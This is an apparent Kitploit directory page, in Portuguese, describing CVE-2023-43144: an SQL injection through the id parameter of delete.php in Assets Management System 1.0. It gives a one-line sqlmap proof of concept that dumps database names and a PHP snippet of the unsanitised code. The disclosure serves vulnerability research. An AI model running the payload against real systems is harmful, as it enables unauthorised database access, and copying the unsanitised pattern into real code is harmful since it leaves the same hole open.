Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-43144 — Assets Management System 1.0 é vulnerável a injeção de SQL através do parâmetro id em delete.php | Kitploit
Ferramentas/GitHubGitHub/pegasus0xx/cve-2023-43144
Análise de VulnerabilidadesAnálise de CódigoExploraçãoSegurança WebSegurança de Banco de Dados
GitHubpegasus0xx/cve-2023-43144

CVE-2023-43144

Assets Management System 1.0 é vulnerável a injeção de SQL através do parâmetro id em delete.php

Ver Repositório
13há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43144

Descrição

O Assets Management System 1.0 é vulnerável a injeção de SQL através do parâmetro id em delete.php

PoC

root@kitploit:~
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

texto alternativo

Revisão de código (delete.php)

root@kitploit:~
 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php'); 

Não há validação ou sanitização da variável $id. Isso significa que qualquer valor fornecido por um usuário como parâmetro id será usado diretamente na consulta SQL.

Baixar ferramenta